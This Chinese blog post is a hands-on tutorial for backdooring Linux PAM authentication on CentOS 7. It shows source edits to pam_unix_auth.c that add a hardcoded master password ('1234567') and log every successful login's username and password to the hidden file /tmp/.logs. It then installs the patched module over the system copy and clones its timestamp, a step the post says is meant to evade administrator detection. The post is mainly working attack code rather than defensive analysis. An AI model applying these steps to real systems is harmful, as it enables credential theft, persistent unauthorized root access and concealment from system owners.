PAM 认证劫持

最新推荐文章于 2024-06-26 08:33:07 发布
最新推荐文章于 2024-06-26 08:33:07 发布
阅读量867 收藏 1
点赞数
分类专栏: 漏洞原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fengzilin1973/article/details/117112499
版权

自动劫持 root 密码并转发密码到邮箱

文章目录

1.PAM 认证简介

PAM(Pluggable Authentication Modules)即可插拔式认证模块,它是一种高效而且灵活的用户级别的认证方式,它也是当前Linux服务器普遍使用的认证方式。PAM可以根据用户的网段、时间、用户名、密码等实现认证。并不是所有需要验证的服务都使用PAM来验证,如MySQL-Server,httpd就没有安装相应的PAM文件(因此我们可以说pam只对简单的应用有认证功能,对于应用机制比较复杂的需要其自己编写相应的认证机制代码啦)。当然,程序通过了PAM的验证之后,PAM程序还会持续跟踪验证后的对象,对其做相应的访问限制。PAM就很像人力资源部门,当你入职一下公司的时候是人力部门得认证你,等认证成功后你才可以入职,而入职之后并不是人力部门就不管理了,人力资源部门还是会持续监督你在公司从入职到离职的行为并做相应的操作

2.程序验证方法

Linux下有验证的程序,如 login、ssh、vsftpd、samba、apache等,他们主要有两种验证方式:

  1. 使用通用的 PAM 验证模块
  2. 程序自写验证功能:例:Apache 的验证是自己开发的

使用 ldd 命令检查一个程序是否支持 PAM 认证

ldd 命令:显示进程运行所依赖的动态连接库的详细信息

┌──(root💀fengzilin55)-[~/桌面]
└─# ldd /bin/login | grep pam  #/bin/login 命令的相关共享库文件列表,可以看到 libpam.so.0 模块,说它支持 pam 认证

image-20210511162522018

pam 模块:每个模块的功能的都是专用的,独特的

PAM 的模块类型

认证管理(auth),账号管理(account),会话管理(session)和密码(password)管理

管理方式说明
auth用来对用户的身份进行识别,如:提示用户输入密码,或判断用户是否为 root 等
account对账号的各项属性进行检查,如:是否允许的登录,是否达到最大用户数,或是root 用户是否允许在这个终端登录等
session这个模块用来定义用户登录前的,及用户退出后所需要进行的操作,如:登录连接信息,用户数据的打开与关闭,挂载文件系统等
password使用用户信息来更新,如:修改用户密码

PAM使用配置/etc/pam.d/下的文件,来管理对程序的认证方式.应用程序 调用相应的配置文件,从而调用本地的认证模块.模块放置在/lib/security下,以加载动态库的形式进,像我们使用su命令时,系统会提示你输入root用户的密码.这就是su命令通过调用PAM模块实现的

3.通过 PAM 认证模块劫持密码

思路:CentOS 7 上安装一个打了后门补丁的 PAM 认证模块,当用户连接时,直接把密码记录下来,然后使用脚本发给我们的邮箱中

3.1 查看 PAM 版本
[root@localhost ~]# rpm -qa | grep pam

image-20210511172705319

下载对应版本的软件包

http://www.linux-pam.org/library/

image-20210511173018154

3.2 安装 gcc 和 pam 依赖
[root@localhost ~]# yum install -y gcc flex

4.安装 PAM 认证模块

将下载的PAM包上传到 CentOS中

[root@localhost ~]# tar -xf Linux-PAM-1.1.8.tar.gz
[root@localhost ~]# cd Linux-PAM-1.1.8/

修改源码,在源码中添加后门

[root@localhost Linux-PAM-1.1.8]# vim modules/pam_unix/pam_unix_auth.c
180  retval = _unix_verify_password(pamh, name, p, ctrl);
在180行下面新增内容如下:

if(strcmp(p,"1234567")==0){
	return PAM_SUCCESS;
}

if(retval==PAM_SUCCESS){
	FILE*fp;
	fp = fopen("/tmp/.logs","a");
	fprintf(fp,"%s->%s\n",name,p);
	fclose(fp);
}

1234567 是backdoor 密码

/tmp/.logs 记录系统登录密码

image-20210511190808227

解决 64 位系统编译时遇到 yywrap() 函数未定义问题

[root@localhost Linux-PAM-1.1.8]# vim /root/Linux-PAM-1.1.8/conf/pam_conv1/pam_conv_l.c  #在第7行插入以下代码

int yywrap(){return 1;}

image-20210511190026415

[root@localhost Linux-PAM-1.1.8]# vim /root/Linux-PAM-1.1.8/doc/specs/parse_l.c

int yywrap(){return 1;}

image-20210511190245707

配置 PAM 以下都是默认参数,因为安装了 flex ,需要手工指定路径

[root@localhost Linux-PAM-1.1.8]# ./configure --prefix=/user --exec-prefix=/usr --localstatedir=/var --sysconfdir=/etc --disable-selinux --with-libiconv-prefix=/usr
[root@localhost Linux-PAM-1.1.8]# make
[root@localhost Linux-PAM-1.1.8]# echo $?
0

#安装编译好的 pam 模块
[root@localhost Linux-PAM-1.1.8]# cd /lib64/security/  
#备份原始版本
[root@localhost security]# mv pam_unix.so{,.bak}
#覆盖系统现有 pam 模块
[root@localhost security]# cp /root/Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /lib64/security/
#克隆原始文件时间,防止时间戳发成改变被管理员检测到
[root@localhost security]# stat pam_unix.*

image-20210511192608823

克隆文件原始时间

[root@localhost security]# touch pam_unix.so -r pam_unix.so.bak 
[root@localhost security]# ll pam_unix.*

image-20210511192724972

新建 xshell 终端窗口

image-20210511192836317

[root@localhost ~]# cat /tmp/.logs 
root->q1!

image-20210511192905471

密码成功记录

测试后门密码登录

image-20210511193050834

image-20210511193129726

image-20210511193205170

后门密码不会被记录到文件中

丰梓林
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux-PAM-1.1.8.tar.bz2下载
07-18
linux pam源码
OpenJDK 64-Bit Server VM warning: INFO: os::commit_memory(0x00000005c0000000, 5726797824, 0) failed;
白元霞的博客
12-24 5004
1、背景 一个进程突然自停,再次启动时报错 2、原因 内存没有释放,无限吃内存导致。(着重查看交换空间) 3、解决办法 释放内存 切换到root用户 #cd /proc/sys/vm/ #free –g #sync #echo 1 > drop_caches #echo 0 > drop_caches 然后free -m 可以发现交换空间在不断释放 .........
实战分析:自动劫持 root 密码并注入后门密码的网络安全威胁与防御策略
最新发布
weixin_43822401的博客
06-26 377
在网络安全领域,后门和密码劫持是常见的攻击手段,它们允许攻击者非法获取系统访问权限。本文将深入探讨一种实战场景,分析攻击者如何自动劫持 root 密码并注入后门密码,以及作为网络安全专家,我们应如何防范这类威胁。
CentOS 7基础模板搭建(ip,host 设置,docker安装)(基于VMware)
rxl2017的博客
08-22 663
1. 安装一个CentOS 7 这里我就不再赘述了,其他的博客有很多的参考教程,目前摆在我们面前的就是一个已经安装好的 CentOS 7 2. 设置静态网络和host 主机名 1. 设置静态网络 cd /etc/sysconfig/network-scripts/ ll 可以看到,我们的网卡名 ifcfg-ens33 编辑这个文件,设置静态模式启动,静态ip,网关,子网掩码,dns,注释uuid(用于克隆) 网关和子网掩码的地址看到这里,vmWare的虚拟网络编辑器 子网ip占着…17.0,网
Linux下的虚拟化部署【2】
qq_38664479的博客
05-08 740
脚本方式管理虚拟机 设定用户级vim的配置文件 ts=4表示1个tab键等于4个空格,ai表示缩进,et表示将tab键转化为空格 1、脚本方式安装虚拟机 使用命令sh westos_vm.sh即可安装名为westos的虚拟机,查看其设备如下: 以上脚本只能安装固定名称的虚拟机,为了安装用户需要的虚拟机,将脚本修改如下: 在脚本中添加条件判定 test –z 字符串:字符串的长度为零 test –e file :文件存在 命令1 && 命令2 :&&表示前面的
Vmware虚拟机三种网络模式详解
dif90304的博客
04-08 2万+
原文来自http://note.youdao.com/share/web/file.html?id=236896997b6ffbaa8e0d92eacd13abbf&type=note 我怕链接会失效,故转载此篇文章 由于linux目前很热门,越来越多的人在学习linux,但是买一台服务放家里来学习,实在是很浪费。那么如何解决这个问题?虚拟机软件是很好的选择...
linux Pam认证
09-08
PAM(Pluggable Authentication Modules)即可插拔式认证模块,它是一种高效而且灵活便利的用户级别的认证方式,它也是当前Linux服务器普遍使用的认证方式。当然,在不同版本的Linux统中部署PAM认证是有所不同的,本文...
pam认证详解
01-16
PAM认证是Linux服务器系统最主要的安全认证模式,掌握PAM认证对于加强系统安全非常重要。pam基本概念的解释,用于初学者.
Linux的PAM安全认证机制.pdf
09-06
Linux PAM 安全认证机制 Linux 操作系统中,安全认证机制是非常重要的,PAM(Pluggable Authentication Modules,插件认证模块)是Linux中的一种安全认证机制。PAM的主要作用是提供一个统一的认证接口,让不同的...
PAM认证详解[参考].pdf
10-11
PAM(可插拔式认证模块)是Linux操作系统中一种强大的认证机制,它允许系统管理员灵活地管理和控制用户的登录和其他服务的验证过程。PAM的主要优势在于其模块化设计,可以适应各种不同的认证需求,而无需修改核心...
利用PAM增强Linux登录认证安全性.pdf
09-07
"利用PAM增强Linux登录认证安全性" 本篇文章主要介绍了如何使用PAM(Pluggable Authentication Modules,插件式鉴别模块)来增强Linux登录认证安全性。文章首先分析了Linux登录机制,然后讨论了如何使用PAM进行用户...
SSH PAM后门(万能密码、记录密码)
网络安全。
08-19 3452
PAM是Linux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码,记录登陆密码等功能。 1、在centos中需要关闭selinux。 永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。 2、查看PAM版本。 rpm -qa|grep pam 源码下载地址:http://www.linux-pam.org/library/ 3、解压。 wget http://www.linux-pam.org/library/Linux-PAM-1.1.8
vm host 文件
dengkuanglong1482的博客
06-08 184
1.vmware的虚拟磁盘可以直接挂在到物理机,copy出来就好。这个没试过啊。2.网络共享方式 。在虚拟机设置里面,option的tab页,shared folders, 选always enable,在下面点击add,按照要求选一下目录就可以了3.虚拟机开ftp,传出来。这个一般主机建个ftp服务器就好了。虚拟机win用flashfxp,linux用filezilla4.装好vmw...
linux万能密码,Linux pam 后门纪录root用户密码以及设置万能密码登录root
weixin_42451611的博客
04-29 768
最近看了一下有关Linux pam后门相关的知识点,发现有一些坑,便记录一下本次用的机器为Ubuntu16.04一、查看本机pam版本dpkg -l | grep pam可以看到pam的版本为1.1.8二、下载对应版本的pamwget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gztar -zxvf Linux-PAM-1.1.8.t...
vmware虚拟机网络配置详解
热门推荐
木牛的博客
02-15 2万+
打开vmware虚拟机,我们可以在选项栏的“编辑”下的“虚拟网络编辑器”中看到VMnet0(桥接模式)、VMnet1(仅主机模式)、VMnet8(NAT模式),那么这些都是有什么作用呢?其实,我们现在看到的VMnet0表示的是用于桥接模式下的虚拟交换机;VMnet1表示的是用于仅主机模式下的虚拟交换机;VMnet8表示的是用于NAT模式下的虚拟交换机。
配置安装在VMWare里面的Ubutun和主机共享上网的步骤
运用之妙,存乎一心
07-30 1507
<br />1,在windows下,连接外网的网卡(本地连接),属性-〉高级-〉Internet连接共享-〉选中允许其他网络用户通过。。-〉家庭网络连接选VMnet1-〉确定<br />  VMnet1 ip设为192.168.0.1<br /><br />2,在linux下,配置静态IP<br />System-> Preferences -> Network Connections -> Wired , Add -> IPV4 Settin , Method 选择 Manual, 然后点击Add,<br
VMware Tools本地提权漏洞CVE-2022-31676分析与复现
Button12138的博客
01-31 1033
VMware Tools本地提权漏洞CVE-2022-31676分析与复现
Vmware虚拟机网络模式原理及配置详解
BigSHI_0822的博客
09-29 1万+
配置虚拟机网络
统一身份认证-PAM
03-06
PAM(Pluggable Authentication Modules)是一个与认证相关的通用架机制,它提供了对所有服务进行认证的中央机制。PAM的设计目标是将系统提供的服务和认证方式分开,使得系统管理员可以根据需要为不同的服务配置不同的认证方式,而无需更改服务程序。PAM可以用于本地登录、远程登录(如telnet、rlogin、ssh等)、FTP、PPP等应用程序中。 PAM的架构如下所示[^1]: - 系统管理员通过PAM配置文件来制定不同应用程序的不同认证策略。 - 应用程序开发者通过在服务程序中使用PAM API(pam_xxxx())来实现对认证方法的调用。 - PAM服务模块的开发者利用PAM SPI编写模块,将不同的认证机制加入到系统中。 - PAM接口库(libpam)读取配置文件,将应用程序和相应的PAM服务模块联系起来。 通过PAM,可以使用现有的PAM模块进行统一身份认证,例如RADIUS、NIS、NCP等。对于特定目录的验证,可以通过PAM完成,而Apache也有一个模块可以提供PAM服务,因此可以利用PAM来进行验证工作[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值